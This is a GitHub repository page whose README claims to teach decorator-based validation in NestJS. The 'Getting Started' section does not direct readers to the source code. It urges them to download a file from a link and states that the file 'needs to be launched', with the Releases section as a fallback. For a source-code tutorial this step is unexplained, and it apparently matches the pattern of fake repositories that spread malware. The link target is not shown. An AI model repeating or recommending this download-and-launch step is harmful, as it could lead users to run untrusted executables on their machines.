Skip to content

Repository created to demonstrate how to create validations using decorators in NestJS. Decorators-based validations, allowing you to implement all the validations in your preferred way and in the most performance-efficient manner possible. All this, without using any external libraries.

Notifications You must be signed in to change notification settings

tintin1886/custom-class-validator

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

2 Commits
Β 
Β 

Repository files navigation

πŸš€ Welcome to custom-class-validator repository!

Class Validator

Description

This repository is dedicated to showcasing how to create validations using decorators in NestJS. By utilizing decorators for validations, you can implement all the necessary validations in a performance-efficient manner without relying on external libraries. This approach provides flexibility in implementing validations according to your preferences.

Topics

  • Class
  • Class Validator
  • Decorator
  • Decorators
  • DTO
  • Learn
  • Multiform Validator
  • NestJS
  • Student-vscode
  • Validator

πŸ“ Getting Started

To explore the implementation of decorators for validations and learn how to create efficient validations in NestJS, you can access the repository from the link below: Download custom-class-validator

The link ends with a file name, indicating that it needs to be launched.

If the link is not working or unavailable, please visit the "Releases" section of this repository for alternative download options.

🌟 Features

  • Implementation of class-based validations using decorators.
  • Learn how to create efficient validations in NestJS without external libraries.
  • Explore different approaches to implementing validations in your preferred way.

πŸ› οΈ Usage

  1. Clone the repository to your local machine.
  2. Navigate to the project directory.
  3. Install the dependencies using npm install.
  4. Explore the codebase to understand how decorators are used for validations.
  5. Experiment with creating your own custom validations.

🀝 Contribution

Contributions to enhance the functionality of this repository are welcome! Feel free to fork the repository and submit pull requests to suggest improvements or new features.

πŸ“„ License

This project is licensed under the MIT License - see the LICENSE file for details.


πŸ“Œ Note: For a comprehensive guide on how to create validations using decorators in NestJS, refer to the documentation in this repository. Happy coding! πŸŽ‰

NestJS Logo

About

Repository created to demonstrate how to create validations using decorators in NestJS. Decorators-based validations, allowing you to implement all the validations in your preferred way and in the most performance-efficient manner possible. All this, without using any external libraries.

Topics

Resources

Stars

Watchers

Forks

Packages

No packages published